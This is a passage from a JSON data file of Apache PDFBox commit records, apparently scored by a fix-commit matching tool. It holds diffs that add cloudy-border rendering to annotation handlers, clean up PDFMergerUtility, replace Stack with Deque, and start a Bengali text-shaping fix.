a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", - "@@ -29,3 +29,5 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationCircle;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderEffectDictionary;", - "@@ -68,6 +70,3 @@ public class PDCircleAppearanceHandler extends PDAbstractAppearanceHandler", - " contentStream.setBorderLine(lineWidth, annotation.getBorderStyle());", - "- ", - "- // the differences rectangle", - "- // TODO: this only works for border effect solid. Cloudy needs a different approach.", - "- setRectDifference(lineWidth);", - "+ PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", - "@@ -80,25 +79,43 @@ public class PDCircleAppearanceHandler extends PDAbstractAppearanceHandler", - "- // lower left corner", - "- float x0 = borderEdge.getLowerLeftX();", - "- float y0 = borderEdge.getLowerLeftY();", - "- // upper right corner", - "- float x1 = borderEdge.getUpperRightX();", - "- float y1 = borderEdge.getUpperRightY();", - "- // mid points", - "- float xm = x0 + borderEdge.getWidth() / 2;", - "- float ym = y0 + borderEdge.getHeight() / 2;", - "- // see http://spencermortensen.com/articles/bezier-circle/", - "- // the below number was calculated from sampling content streams", - "- // generated using Adobe Reader", - "- float magic = 0.55555417f;", - "- // control point offsets", - "- float vOffset = borderEdge.getHeight() / 2 * magic;", - "- float hOffset = borderEdge.getWidth() / 2 * magic;", - "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", - "+ {", - "+ CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", - "+ borderEffect.getIntensity(), lineWidth, getRectangle());", - "+ cloudyBorder.createCloudyEllipse(annotation.getRectDifference());", - "+ annotation.setRectangle(cloudyBorder.getRectangle());", - "+ annotation.setRectDifference(cloudyBorder.getRectDifference());", - "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", - "+ appearanceStream.setBBox(cloudyBorder.getBBox());", - "+ appearanceStream.setMatrix(cloudyBorder.getMatrix());", - "+ }", - "+ else", - "+ {", - "+ // the differences rectangle", - "+ setRectDifference(lineWidth);", - "+ ", - "+ // lower left corner", - "+ float x0 = borderEdge.getLowerLeftX();", - "+ float y0 = borderEdge.getLowerLeftY();", - "+ // upper right corner", - "+ float x1 = borderEdge.getUpperRightX();", - "+ float y1 = borderEdge.getUpperRightY();", - "+ // mid points", - "+ float xm = x0 + borderEdge.getWidth() / 2;", - "+ float ym = y0 + borderEdge.getHeight() / 2;", - "+ // see http://spencermortensen.com/articles/bezier-circle/", - "+ // the below number was calculated from sampling content streams", - "+ // generated using Adobe Reader", - "+ float magic = 0.55555417f;", - "+ // control point offsets", - "+ float vOffset = borderEdge.getHeight() / 2 * magic;", - "+ float hOffset = borderEdge.getWidth() / 2 * magic;", - "+ ", - "+ contentStream.moveTo(xm, y1);", - "+ contentStream.curveTo((xm + hOffset), y1, x1, (ym + vOffset), x1, ym);", - "+ contentStream.curveTo(x1, (ym - vOffset), (xm + hOffset), y0, xm, y0);", - "+ contentStream.curveTo((xm - hOffset), y0, x0, (ym - vOffset), x0, ym);", - "+ contentStream.curveTo(x0, (ym + vOffset), (xm - hOffset), y1, xm, y1);", - "+ contentStream.closePath();", - "+ }", - "- contentStream.moveTo(xm, y1);", - "- contentStream.curveTo((xm + hOffset), y1, x1, (ym + vOffset), x1, ym);", - "- contentStream.curveTo(x1, (ym - vOffset), (xm + hOffset), y0, xm, y0);", - "- contentStream.curveTo((xm - hOffset), y0, x0, (ym - vOffset), x0, ym);", - "- contentStream.curveTo(x0, (ym + vOffset), (xm - hOffset), y1, xm, y1);", - "- contentStream.closePath();", - " contentStream.drawShape(lineWidth, hasStroke, hasBackground);", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "index d2ef93cdb..b07d3823c 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "@@ -30,2 +30,4 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationPolygon;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderEffectDictionary;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", - "@@ -113,31 +115,43 @@ public class PDPolygonAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "-", - "- // the differences rectangle", - "- // TODO: this only works for border effect solid. Cloudy needs a", - "- // different approach.", - "- setRectDifference(lineWidth);", - "-", - "- // Acrobat applies a padding to each side of the bbox so the line is", - "- // completely within the bbox.", - "-", - "- for (int i = 0; i < pathArray.length; i++)", - "+ ", - "+ PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", - "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", - " {", - "- float[] pointsArray = pathArray[i];", - "- // first array shall be of size 2 and specify the moveto operator", - "- if (i == 0 && pointsArray.length == 2)", - "- {", - "- contentStream.moveTo(pointsArray[0], pointsArray[1]);", - "- }", - "- else", - "+ CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", - "+ borderEffect.getIntensity(), lineWidth, getRectangle());", - "+ cloudyBorder.createCloudyPolygon(pathArray);", - "+ annotation.setRectangle(cloudyBorder.getRectangle());", - "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", - "+ appearanceStream.setBBox(cloudyBorder.getBBox());", - "+ appearanceStream.setMatrix(cloudyBorder.getMatrix());", - "+ }", - "+ else", - "+ {", - "+ // the differences rectangle", - "+ setRectDifference(lineWidth);", - "+ ", - "+ // Acrobat applies a padding to each side of the bbox so the line is", - "+ // completely within the bbox.", - "+ ", - "+ for (int i = 0; i < pathArray.length; i++)", - " {", - "- // entries of length 2 shall be treated as lineto operator", - "- if (pointsArray.length == 2)", - "+ float[] pointsArray = pathArray[i];", - "+ // first array shall be of size 2 and specify the moveto operator", - "+ if (i == 0 && pointsArray.length == 2)", - " {", - "- contentStream.lineTo(pointsArray[0], pointsArray[1]);", - "+ contentStream.moveTo(pointsArray[0], pointsArray[1]);", - " }", - "- else if (pointsArray.length == 6)", - "+ else", - " {", - "- contentStream.curveTo(pointsArray[0], pointsArray[1],", - "- pointsArray[2], pointsArray[3],", - "- pointsArray[4], pointsArray[5]);", - "+ // entries of length 2 shall be treated as lineto operator", - "+ if (pointsArray.length == 2)", - "+ {", - "+ contentStream.lineTo(pointsArray[0], pointsArray[1]);", - "+ }", - "+ else if (pointsArray.length == 6)", - "+ {", - "+ contentStream.curveTo(pointsArray[0], pointsArray[1],", - "+ pointsArray[2], pointsArray[3],", - "+ pointsArray[4], pointsArray[5]);", - "+ }", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", - "index aeb9edf60..31c295432 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", - "@@ -31,2 +31,4 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationSquare;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderEffectDictionary;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", - "@@ -70,29 +72,14 @@ public class PDSquareAppearanceHandler extends PDAbstractAppearanceHandler", - " contentStream.setBorderLine(lineWidth, annotation.getBorderStyle()); ", - "+ PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", - "- // handle the border box", - "- // ", - "- // There are two options. The handling is not part of the PDF specification but", - "- // implementation specific to Adobe Reader", - "- // - if /RD is set the border box is the /Rect entry inset by the respective", - "- // border difference.", - "- // - if /RD is not set the border box is defined by the /Rect entry. The /RD entry will", - "- // be set to be the line width and the /Rect is enlarged by the /RD amount", - "-", - "- PDRectangle borderBox = null;", - "- float[] rectDifferences = annotation.getRectDifferences();", - "- ", - "- if (rectDifferences.length == 0)", - "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", - " {", - "- borderBox = getPaddedRectangle(getRectangle(), lineWidth/2);", - "- // the differences rectangle", - "- // TODO: this only works for border effect solid. Cloudy needs a different approach.", - "- annotation.setRectDifferences(lineWidth/2);", - "- annotation.setRectangle(addRectDifferences(getRectangle(), annotation.getRectDifferences()));", - "- ", - "- // when the normal appearance stream was generated BBox and Matrix have been set to the", - "- // values of the original /Rect. As the /Rect was changed that needs to be adjusted too.", - "- annotation.getNormalAppearanceStream().setBBox(getRectangle());", - "- AffineTransform transform = AffineTransform.getTranslateInstance(-getRectangle().getLowerLeftX(),", - "- -getRectangle().getLowerLeftY());", - "- annotation.getNormalAppearanceStream().setMatrix(transform);", - "+ CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", - "+ borderEffect.getIntensity(), lineWidth, getRectangle());", - "+ cloudyBorder.createCloudyRectangle(annotation.getRectDifference());", - "+ annotation.setRectangle(cloudyBorder.getRectangle());", - "+ annotation.setRectDifference(cloudyBorder.getRectDifference());", - "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", - "+ appearanceStream.setBBox(cloudyBorder.getBBox());", - "+ appearanceStream.setMatrix(cloudyBorder.getMatrix());", - " }", - "@@ -100,9 +87,38 @@ public class PDSquareAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- borderBox = applyRectDifferences(getRectangle(), rectDifferences);", - "- borderBox = getPaddedRectangle(borderBox, lineWidth/2);", - "- }", - "+ // handle the border box", - "+ //", - "+ // There are two options. The handling is not part of the PDF specification but", - "+ // implementation specific to Adobe Reader", - "+ // - if /RD is set the border box is the /Rect entry inset by the respective", - "+ // border difference.", - "+ // - if /RD is not set the border box is defined by the /Rect entry. The /RD entry will", - "+ // be set to be the line width and the /Rect is enlarged by the /RD amount", - "- contentStream.addRect(borderBox.getLowerLeftX(), borderBox.getLowerLeftY(),", - "- borderBox.getWidth(), borderBox.getHeight());", - "+ PDRectangle borderBox = null;", - "+ float[] rectDifferences = annotation.getRectDifferences();", - "+ if (rectDifferences.length == 0)", - "+ {", - "+ borderBox = getPaddedRectangle(getRectangle(), lineWidth/2);", - "+ // the differences rectangle", - "+ annotation.setRectDifferences(lineWidth/2);", - "+ annotation.setRectangle(addRectDifferences(getRectangle(), annotation.getRectDifferences()));", - "+", - "+ // when the normal appearance stream was generated BBox and Matrix have been set to the", - "+ // values of the original /Rect. As the /Rect was changed that needs to be adjusted too.", - "+ annotation.getNormalAppearanceStream().setBBox(getRectangle());", - "+ AffineTransform transform = AffineTransform.getTranslateInstance(-getRectangle().getLowerLeftX(),", - "+ -getRectangle().getLowerLeftY());", - "+ annotation.getNormalAppearanceStream().setMatrix(transform);", - "+ }", - "+ else", - "+ {", - "+ borderBox = applyRectDifferences(getRectangle(), rectDifferences);", - "+ borderBox = getPaddedRectangle(borderBox, lineWidth/2);", - "+ }", - "+", - "+ contentStream.addRect(borderBox.getLowerLeftX(), borderBox.getLowerLeftY(),", - "+ borderBox.getWidth(), borderBox.getHeight());", - "+ }", - "+", - " contentStream.drawShape(lineWidth, hasStroke, hasBackground);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "f568c13db0a43a9b48e79be7a4cc1546a8cff6b2", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524161446, - "hunks": 2, - "message": "PDFBOX-3999: revert two accidentally committed segments git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829597 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "index 4da4e6f61..27ae233e4 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "@@ -531,20 +531,2 @@ public class PDFMergerUtility", - " {", - "-// System.out.println(srcNames);", - "-// System.out.println(srcNames.getDests());", - "-// System.out.println(srcNames.getDests().getNames());", - "-// Map names1 = srcNames.getDests().getNames();", - "-// Map names2 = destNames.getDests().getNames();", - "-// if (names1 != null)", - "-// System.out.println(names1.keySet());", - "-// else", - "-// {", - "-// List> kids = srcNames.getDests().getKids();", - "-// for (PDNameTreeNode kid : kids)", - "-// {", - "-// ", - "-// System.out.println(kid.getNames().keySet());", - "-// }", - "-// ", - "-// }", - "-// System.out.println(names2.keySet());", - " cloner.cloneMerge(srcNames, destNames);", - "@@ -1003,20 +985,20 @@ public class PDFMergerUtility", - " }", - "-// else", - "-// {", - "-// // PDFBOX-3999: clone objects that are not in mapping to make sure that", - "-// // these don't remain attached to the source document", - "-// COSBase item = parentTreeEntry.getItem(COSName.OBJ);", - "-// if (item instanceof COSObject)", - "-// {", - "-// LOG.warn(\"clone potential orphan object in structure tree: \" + item +", - "-// \", type: \" + ((COSDictionary) obj).getNameAsString(COSName.TYPE));", - "-// }", - "-// else", - "-// {", - "-// // don't display because of stack overflow", - "-// LOG.warn(\"clone potential orphan object in structure tree, type: \" +", - "-// ((COSDictionary) obj).getNameAsString(COSName.TYPE));", - "-// }", - "-// parentTreeEntry.setItem(COSName.OBJ, cloner.cloneForNewDocument(obj));", - "-// }", - "+ else", - "+ {", - "+ // PDFBOX-3999: clone objects that are not in mapping to make sure that", - "+ // these don't remain attached to the source document", - "+ COSBase item = parentTreeEntry.getItem(COSName.OBJ);", - "+ if (item instanceof COSObject)", - "+ {", - "+ LOG.debug(\"clone potential orphan object in structure tree: \" + item +", - "+ \", type: \" + ((COSDictionary) obj).getNameAsString(COSName.TYPE));", - "+ }", - "+ else", - "+ {", - "+ // don't display because of stack overflow", - "+ LOG.debug(\"clone potential orphan object in structure tree, type: \" +", - "+ ((COSDictionary) obj).getNameAsString(COSName.TYPE));", - "+ }", - "+ parentTreeEntry.setItem(COSName.OBJ, cloner.cloneForNewDocument(obj));", - "+ }", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3999": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3999", - "relevance": 2 - } - ] - }, - { - "commit_id": "4c74fff371dd8017322cd68b9aa50d73f7a70d00", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530810951, - "hunks": 14, - "message": "PDFBOX-3353: Add clipping rect; remove \"factor\" which was just a guess; draw text in cloudy annotation as if the rectangle hadn't changed for the clouds; fix bug with /RD and non cloudy git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835157 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "index 9904364b6..b9e0c9771 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "@@ -162,2 +162,7 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "+ // Adobe draws the text with the original rectangle in mind.", - "+ // but if there is an /RD, then writing area get smaller.", - "+ // do this here because /RD is overwritten in a few lines", - "+ borderBox = applyRectDifferences(getRectangle(), annotation.getRectDifferences());", - "+", - " //TODO this segment was copied from square handler. Refactor?", - "@@ -169,4 +174,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", - "- borderBox = cloudyBorder.getBBox();", - "- appearanceStream.setBBox(borderBox);", - "+ appearanceStream.setBBox(cloudyBorder.getBBox());", - " appearanceStream.setMatrix(cloudyBorder.getMatrix());", - "@@ -182,15 +186,9 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " // - if /RD is not set then we don't touch /RD etc because Adobe doesn't either.", - "- float[] rectDifferences = annotation.getRectDifferences();", - "- if (rectDifferences.length == 0)", - "- {", - "- borderBox = getRectangle();", - "- }", - "- else", - "- {", - "- borderBox = applyRectDifferences(getRectangle(), rectDifferences);", - "- annotation.getNormalAppearanceStream().setBBox(borderBox);", - "- }", - "- borderBox = getPaddedRectangle(borderBox, ab.width / 2);", - "- cs.addRect(borderBox.getLowerLeftX(), borderBox.getLowerLeftY(),", - "- borderBox.getWidth(), borderBox.getHeight());", - "+ borderBox = applyRectDifferences(getRectangle(), annotation.getRectDifferences());", - "+ annotation.getNormalAppearanceStream().setBBox(borderBox);", - "+", - "+ // note that borderBox is not modified", - "+ PDRectangle paddedRectangle = getPaddedRectangle(borderBox, ab.width / 2);", - "+ cs.addRect(paddedRectangle.getLowerLeftX(), paddedRectangle.getLowerLeftY(),", - "+ paddedRectangle.getWidth(), paddedRectangle.getHeight());", - " }", - "@@ -199,3 +197,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " // rotation is an undocumented feature, but Adobe uses it. Examples can be found", - "- // in pdf_commenting_new.pdf file.", - "+ // in pdf_commenting_new.pdf file, page 3.", - " int rotation = annotation.getCOSObject().getInt(COSName.ROTATE, 0);", - "@@ -204,14 +202,13 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " float yOffset;", - "- float width = rotation == 90 || rotation == 270 ? borderBox.getHeight(): borderBox.getWidth();", - "- // somewhat inspired by AppearanceGeneratorHelper.insertGeneratedAppearance()", - "- cs.beginText();", - "+ float width = rotation == 90 || rotation == 270 ? borderBox.getHeight() : borderBox.getWidth();", - "+ // strategy to write formatted text is somewhat inspired by ", - "+ // AppearanceGeneratorHelper.insertGeneratedAppearance()", - " PDFont font = PDType1Font.HELVETICA;", - "- int factor = 1;", - "- if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", - "- {", - "- //TODO cloudy needs to be reviewed too.", - "- factor = 2;", - "- }", - "+ float clipY;", - "+ float clipWidth = width - ab.width * 4;", - "+ float clipHeight = rotation == 90 || rotation == 270 ? ", - "+ borderBox.getWidth() - ab.width * 4 : borderBox.getHeight() - ab.width * 4;", - " float fontSize = extractFontSize(annotation);", - "- // used by Adobe, no idea where it comes from, actual font bbox max y is 0.931", - "+", - "+ // value used by Adobe, no idea where it comes from, actual font bbox max y is 0.931", - " // gathered by creating an annotation with width 0.", - "@@ -221,12 +218,15 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " case 180:", - "- xOffset = - borderBox.getUpperRightX() + ab.width * 2 * factor; ", - "- yOffset = - borderBox.getLowerLeftY() - ab.width * 2 * factor - yDelta * fontSize * factor;", - "+ xOffset = - borderBox.getUpperRightX() + ab.width * 2;", - "+ yOffset = - borderBox.getLowerLeftY() - ab.width * 2 - yDelta * fontSize;", - "+ clipY = - borderBox.getUpperRightY() + ab.width * 2;", - " break;", - " case 90:", - "- xOffset = borderBox.getLowerLeftY() + ab.width * 2 * factor;", - "- yOffset = - borderBox.getLowerLeftX() - ab.width * 2 * factor - yDelta * fontSize * factor;", - "+ xOffset = borderBox.getLowerLeftY() + ab.width * 2;", - "+ yOffset = - borderBox.getLowerLeftX() - ab.width * 2 - yDelta * fontSize;", - "+ clipY = - borderBox.getUpperRightX() + ab.width * 2;", - " break;", - " case 270:", - "- xOffset = - borderBox.getUpperRightY() + ab.width * 2 * factor;", - "- yOffset = borderBox.getUpperRightX() - ab.width * 2 * factor - yDelta * fontSize * factor;", - "+ xOffset = - borderBox.getUpperRightY() + ab.width * 2;", - "+ yOffset = borderBox.getUpperRightX() - ab.width * 2 - yDelta * fontSize;", - "+ clipY = borderBox.getLowerLeftX() + ab.width * 2;", - " break;", - "@@ -234,6 +234,13 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " default:", - "- xOffset = borderBox.getLowerLeftX() + ab.width * 2 * factor;", - "- yOffset = borderBox.getUpperRightY() - ab.width * 2 * factor - yDelta * fontSize * factor;", - "+ xOffset = borderBox.getLowerLeftX() + ab.width * 2;", - "+ yOffset = borderBox.getUpperRightY() - ab.width * 2 - yDelta * fontSize;", - "+ clipY = borderBox.getLowerLeftY() + ab.width * 2;", - " break;", - " }", - "+", - "+ // clip writing area", - "+ cs.addRect(xOffset, clipY, clipWidth, clipHeight);", - "+ cs.clip();", - "+", - "+ cs.beginText();", - " cs.setFont(font, fontSize);", - "@@ -246,5 +253,4 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " .text(new PlainText(annotation.getContents()))", - "- .width(width - ab.width * factor * 4)", - "+ .width(width - ab.width * 4)", - " .wrapLines(true)", - "- //TODO some reverse engineering needed to find out padding", - " .initialOffset(xOffset, yOffset)" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "e5a005d1e4fd4ab91af784ecb778f708ec0dd954", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1525957062, - "hunks": 7, - "message": "PDFBOX-4071: replace the synchronized class \"Stack\" by the unsynchronized \"Deque\" git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831334 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "index 8140a4496..d85a36bce 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", - "@@ -25,3 +25,5 @@ import java.io.OutputStream;", - " import java.text.NumberFormat;", - "+import java.util.ArrayDeque;", - " import java.util.ArrayList;", - "+import java.util.Deque;", - " import java.util.HashMap;", - "@@ -32,3 +34,2 @@ import java.util.Map;", - " import java.util.Set;", - "-import java.util.Stack;", - " import java.util.regex.Pattern;", - "@@ -83,6 +84,6 @@ abstract class PDAbstractContentStream implements Closeable", - " protected boolean inTextMode = false;", - "- protected final Stack fontStack = new Stack<>();", - "+ protected final Deque fontStack = new ArrayDeque<>();", - "- protected final Stack nonStrokingColorSpaceStack = new Stack<>();", - "- protected final Stack strokingColorSpaceStack = new Stack<>();", - "+ protected final Deque nonStrokingColorSpaceStack = new ArrayDeque<>();", - "+ protected final Deque strokingColorSpaceStack = new ArrayDeque<>();", - "@@ -172,3 +173,4 @@ abstract class PDAbstractContentStream implements Closeable", - " {", - "- fontStack.setElementAt(font, fontStack.size() - 1);", - "+ fontStack.pop();", - "+ fontStack.push(font);", - " }", - "@@ -1553,3 +1555,4 @@ abstract class PDAbstractContentStream implements Closeable", - " {", - "- strokingColorSpaceStack.setElementAt(colorSpace, strokingColorSpaceStack.size() - 1);", - "+ strokingColorSpaceStack.pop();", - "+ strokingColorSpaceStack.push(colorSpace);", - " }", - "@@ -1565,3 +1568,4 @@ abstract class PDAbstractContentStream implements Closeable", - " {", - "- nonStrokingColorSpaceStack.setElementAt(colorSpace, nonStrokingColorSpaceStack.size() - 1);", - "+ nonStrokingColorSpaceStack.pop();", - "+ nonStrokingColorSpaceStack.push(colorSpace);", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "f7969b5b3de6acc8f34454aaed73a1dfb1776076", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524995452, - "hunks": 15, - "message": "PDFBOX-4189: Bengali fix for GSUB: ja phala not rendering properly, by Palash Ray git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830499 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "index e1246f380..a44d464df 100644", - "--- a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "@@ -19,4 +19,9 @@ package org.apache.pdfbox.examples.pdmodel;", - "+import java.io.BufferedReader;", - " import java.io.IOException;", - "+import java.io.InputStreamReader;", - " import java.net.URISyntaxException;", - "+import java.util.ArrayList;", - "+import java.util.List;", - "+import java.util.StringTokenizer;", - "@@ -25,5 +30,5 @@ import org.apache.pdfbox.pdmodel.PDPage;", - " import org.apache.pdfbox.pdmodel.PDPageContentStream;", - "+import org.apache.pdfbox.pdmodel.common.PDRectangle;", - " import org.apache.pdfbox.pdmodel.font.PDFont;", - " import org.apache.pdfbox.pdmodel.font.PDType0Font;", - "-import org.apache.pdfbox.pdmodel.graphics.image.PDImageXObject;", - "@@ -32,5 +37,4 @@ import org.apache.pdfbox.pdmodel.graphics.image.PDImageXObject;", - " * \"https://svn.apache.org/viewvc/pdfbox/trunk/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/HelloWorldTTF.java?view=markup\">PdfBox", - "- * Example. This attempts to correctly demonstrate to what extent Bengali text rendering is", - "- * supported. First, we render some text, and then embed an image with the correct text displayed on", - "- * the next page.", - "+ * Example. This attempts to correctly demonstrate to what extent Bengali text rendering is supported. First, we", - "+ * render some text, and then embed an image with the correct text displayed on the next page.", - " *", - "@@ -41,13 +45,7 @@ public class BengaliPdfGenerationHelloWorld", - " {", - "- /**", - "- * The 